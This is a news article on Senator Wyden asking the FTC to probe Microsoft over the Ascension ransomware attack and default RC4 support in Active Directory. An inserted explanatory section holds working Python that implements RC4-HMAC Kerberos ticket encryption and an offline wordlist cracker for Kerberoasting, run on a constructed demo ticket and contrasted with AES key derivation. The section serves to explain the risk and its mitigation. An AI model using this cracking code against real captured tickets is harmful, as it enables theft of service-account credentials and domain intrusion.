Wyden demands FTC probe Microsoft for cyber ‘negligence’

September 11, 2025

  • What’s at stake: Widespread vendor concentration could propagate systemic cyber risk across financial services.
  • Expert quote: Sen. Wyden accused Microsoft of “gross cybersecurity negligence” and profiting despite contributing to systemic insecurity.
  • Supporting data: Cloud market share has driven concentration risks. Market share: AWS 31%, Azure 25%, Google Cloud 11%.

Overview bullets generated by AI with editorial review

Sen. Ron Wyden, a Democrat from Oregon, urged the Federal Trade Commission (FTC) on Wednesday to launch an investigation into Microsoft, accusing the technology giant of “gross cybersecurity negligence” and contributing to ransomware attacks that pose significant threats to critical U.S. infrastructure.

Wyden’s letter to FTC Chair Andrew Ferguson highlighted what he called insecure software practices and Microsoft’s “de facto monopolization” of the enterprise operating system market, asserting that this combination creates a “serious national security threat.”

The senator’s demand focused on a 2024 ransomware attack on Ascension, a major hospital system, which resulted in the theft of sensitive data from 5.6 million patients and disrupted patient care.

This incident, Wyden argued, illustrates the widespread danger stemming from Microsoft’s security shortcomings, a concern highly relevant to U.S. banks and credit unions relying on similar infrastructure.

For its part, Microsoft disputed the specific claims Wyden made in his letter about the causes of the cyberattack against Ascension.

The company also points to its Secure Future Initiative, which it has described as "the largest cybersecurity engineering project in history" and a "multiyear effort to revolutionize the way we design, build, test, and operate our products and services."

2024 cyberattack reveals holes in Microsoft defenses

Wyden cited multiple issues with Microsoft's cybersecurity practices, but the letter's primary focus is on a technique known as Kerberoasting, which the threat actor used in the Ascension incident.

The 2024 cyberattack began when a contractor inadvertently downloaded malware after clicking a malicious link from a Microsoft Bing search result in the Microsoft Edge browser.

This detail, which Wyden said Ascension told his staff, had not been previously reported.

After this initial breach, insecure default settings on Microsoft software allowed the hackers to move laterally within Ascension’s network and gain highly privileged access to its Microsoft Active Directory server, according to Wyden.


Active Directory is the identity backbone of most corporate Windows networks: it manages internal accounts and authenticates them, so whoever controls it controls nearly everything the domain trusts.

Hackers used a technique known as Kerberoasting, an attack that takes place after an initial intrusion into a network, to achieve this privileged access.

In a Kerberoasting attack, an attacker who already controls any ordinary domain account asks Active Directory's Kerberos Key Distribution Center for a service ticket for a target service account, identified by its service principal name (SPN). Any authenticated user is allowed to request such a ticket, so the request itself looks legitimate.

Part of that ticket comes back encrypted with a key derived from the service account's password. When RC4 is used, that key is simply the account's NT hash, an unsalted MD4 digest of the password, so the ticket is effectively a password hash the attacker can carry away.

The attacker then takes the encrypted ticket to their own machine and cracks it offline: for each candidate password, derive the key, decrypt, and check whether the result verifies. No further contact with the domain is needed, so account-lockout policies and domain-controller monitoring never see the guesses.

Once they obtain the password, they can impersonate the service account, gaining access to any systems, assets or networks it is authorized to use, and service accounts are frequently more privileged than they need to be.

A key enabler of this attack, according to Wyden, is Microsoft’s continued default support for RC4, which he called an “insecure encryption technology from the 1980s.”

While Microsoft's software also supports the more secure Advanced Encryption Standard (AES), leaving RC4 enabled by default needlessly exposes customers by making Kerberoasting attacks significantly easier to execute, Wyden said.

When AES is used instead, the key is derived from the password with a per-account salt and 4,096 rounds of PBKDF2, so each guess costs thousands of hash operations rather than one, and precomputed results cannot be reused across accounts. That makes cracking far slower, though a short or guessable service-account password can still fall.
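
The mechanics above can be shown end to end in code. The following Python is an added example written for this page; it is not code from the article, from Microsoft or from the senator's letter. It implements the RC4-HMAC ticket encryption Windows uses when RC4 is negotiated (RFC 4757), the NT-hash key that encryption rests on, and the offline guess-and-check loop a cracker runs against a captured ticket; for contrast it also computes the salted, iterated first stage of the AES string-to-key function (RFC 3962). The realm, account names, password and wordlist are constructed for the demo, the ticket plaintext is a placeholder string rather than a real encoded ticket, and the 4-byte little-endian key usage value 2 is the one Kerberos assigns to a service ticket's encrypted part.

```python
# Added example (not from the article, Microsoft or Wyden's letter): a
# Kerberoasting crack in miniature. RFC 4757 RC4-HMAC (etype 23) ticket
# encryption, the NT-hash key it uses, and the offline guess loop a cracker
# runs. MD4 is written out because many OpenSSL 3 builds of Python lack it.
# Realm, account names, password and wordlist are constructed for the demo.
import hashlib, hmac, os, struct

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Windows NT hash = MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, s: ((v << s) | (v >> (32 - s))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for j, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[j % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """RC4-HMAC long-term key: the bare NT hash, no salt, no iterations."""
    return md4(password.encode("utf-16le"))

def aes_prekey(password: str, realm: str, principal: str) -> bytes:
    """First stage of AES string-to-key (RFC 3962): PBKDF2-HMAC-SHA1, 4096
    iterations, salted with REALM + principal, so the same password yields a
    different key per account. (The real key then passes through one more
    AES-based DK step, omitted here.)"""
    salt = (realm.upper() + principal).encode()
    return hashlib.pbkdf2_hmac("sha1", password.encode(), salt, 4096, 32)

def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

TICKET_USAGE = 2  # RFC 4120 key usage for a service ticket's enc-part

def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes = None) -> bytes:
    """KDC side: the enc-part a TGS-REP carries for an RC4-keyed service account."""
    k1 = hmac_md5(key, struct.pack("<I", TICKET_USAGE))
    confounder = confounder or os.urandom(8)
    checksum = hmac_md5(k1, confounder + plaintext)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)

def rc4_hmac_check(key: bytes, blob: bytes):
    """Cracker side: decrypt under a candidate key; the checksum says whether
    the guess was right, with no further contact with the domain controller."""
    k1 = hmac_md5(key, struct.pack("<I", TICKET_USAGE))
    checksum, edata = blob[:16], blob[16:]
    plain = rc4(hmac_md5(k1, checksum), edata)
    return plain[8:] if hmac.compare_digest(hmac_md5(k1, plain), checksum) else None

def kerberoast_crack(blob: bytes, wordlist):
    """One MD4 plus three HMAC-MD5 and an RC4 keystream per guess."""
    for guess in wordlist:
        if rc4_hmac_check(nt_hash(guess), blob) is not None:
            return guess
    return None

# Constructed demo: an SPN-bearing service account with a guessable password.
SVC_PASSWORD = "Summer2024!"
TICKET_PLAINTEXT = b"placeholder for PAC + session key, MSSQLSvc/db01.corp.example.com"
TICKET = rc4_hmac_encrypt(nt_hash(SVC_PASSWORD), TICKET_PLAINTEXT)
WORDLIST = ["Password1", "Welcome123", "Summer2024!", "P@ssw0rd"]

if __name__ == "__main__":
    print("cracked:", kerberoast_crack(TICKET, WORDLIST))
    print("AES pre-keys differ per account for the same password:",
          aes_prekey(SVC_PASSWORD, "corp.example.com", "svc_sql")
          != aes_prekey(SVC_PASSWORD, "corp.example.com", "svc_web"))
```

Run it as a script to watch the password come back out of the wordlist. The contrast with `aes_prekey` is the whole argument: an RC4 guess costs one MD4 and a few HMAC-MD5 operations and the same NT hash works against every account with that password, while the AES path charges 4,096 HMAC-SHA1 iterations per guess and a different salt per account. Setting a service account's `msDS-SupportedEncryptionTypes` to AES only forces the KDC onto the AES path for tickets issued to that account.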

In its response to Wyden’s letter, a Microsoft spokesperson called RC4 an “old standard” that the company discourages customers from using in a variety of documentation.

The spokesperson also said RC4 makes up "less than 0.1% of our traffic." However, "disabling its use completely would break many customer systems."

The spokesperson said the company is “on a path to gradually reduce the extent to which customers can use it” and has it “on our roadmap to ultimately disable its use.”

The spokesperson also said the company has “already removed use of DES,” which like RC4 is an old, insecure encryption standard.

Complaints about how Microsoft publicized the Kerberoasting risk

Wyden said in his letter that his staff urged Microsoft officials in July 2024 to warn customers about the Kerberoasting threat. Microsoft subsequently published a blog post in October 2024 recommending actions to protect against Kerberoasting and announced plans for a software update to disable RC4.


However, 11 months later, Microsoft has not released this promised security update, Wyden said.

Microsoft responded to this complaint: starting in the first quarter of 2026, new installations of Active Directory domains using Windows Server 2025 will have RC4 disabled by default, according to the spokesperson.

Microsoft also plans to include additional mitigations for existing deployments, though the spokesperson did not detail them.

Wyden also criticized Microsoft’s communication strategy, stating that instead of clear guidance for senior executives, Microsoft published a “highly technical blog post on an obscure area of the company’s website on a Friday afternoon.”

He added that Microsoft “took no meaningful steps to publicize this blog post” and “declined to explicitly warn its customers that they are vulnerable to the Kerberoasting hacking technique unless they change the default settings chosen by Microsoft.”

This, he concluded, leaves most Microsoft customers highly susceptible.

Report of ‘inadequate security culture’ and response

This isn’t Wyden’s first challenge to Microsoft’s cybersecurity practices.

In July 2023, he called for investigations into “lax security practices” by Microsoft that “reportedly enabled Chinese espionage” against U.S. government agencies.

A subsequent review by the Cyber Safety Review Board (CSRB), which Wyden and others had requested, concluded that “Microsoft’s security culture was inadequate and requires an overhaul, particularly in light of the company’s centrality in the technology ecosystem and the level of trust customers place in the company to protect their data and operations.”

The CSRB highlighted “a cascade of Microsoft’s avoidable errors that allowed this intrusion to succeed” and its “failure to detect the compromise of its cryptographic crown jewels on its own.”

Microsoft launched its Secure Future Initiative (SFI) in November 2023, after the summer 2023 intrusion and before the CSRB published its report in April 2024. CEO Satya Nadella has said that security is the company's "top priority."

The initiative focused on AI-based cyber defenses, advances in fundamental software engineering and advocacy for stronger international norms.

In April 2025, Microsoft published an SFI progress report, which highlighted a number of specific security improvements, largely around enabling and adopting hardware-based authentication.

It also said it was working to cut the time to mitigate cloud vulnerabilities by 50% and implementing so-called secure by design and secure by default principles, two concepts that federal agencies have pressured software companies to adopt in their software development practices.

Concentration risk

Wyden in his Wednesday letter also alluded to the significant concentration risks prevalent in the cloud services market.

Research released in February by the market intelligence firm Synergy Research Group indicates that Amazon Web Services had 31% of the cloud services market share in the first quarter, Microsoft Azure had 25%, and Google Cloud had 11%.

This market concentration exposes many financial services companies to the same set of physical or cyber risks.

Software companies are a "key source of cyber risk in the economy" because vulnerabilities spread through the digital supply chain, according to a research paper posted in January to the Social Science Research Network (SSRN).

Two academics with the NOVA School of Business and Economics and ESADE Business School conducted the research by compiling a database that links software vulnerabilities (discovered between 2006 and 2023) and specific cyberattacks to software companies and their customer firms.

Vulnerabilities in software from larger vendors are "more harmful" and raise the likelihood of cyberattacks, according to the research. In one of its datasets, Microsoft accounted for the most vulnerabilities (332) and was linked to the most customer firms (742).

Cybersecurity leaders at financial firms have voiced frustration with the major cloud providers, finding them unresponsive to security concerns and prone to charging extra for "foundational controls." Clarissa Banks, CISO of the payments company Deluxe, made that point during a 2024 panel at the RSAC cybersecurity conference.

Wyden also made this point in his letter on Wednesday.

“Microsoft has become like an arsonist selling firefighting services to their victims,” the senator said. He added that government agencies, companies and nonprofits “have no choice but to continue to use the company’s software, even after they are hacked, because of Microsoft’s near-monopoly over enterprise IT.”
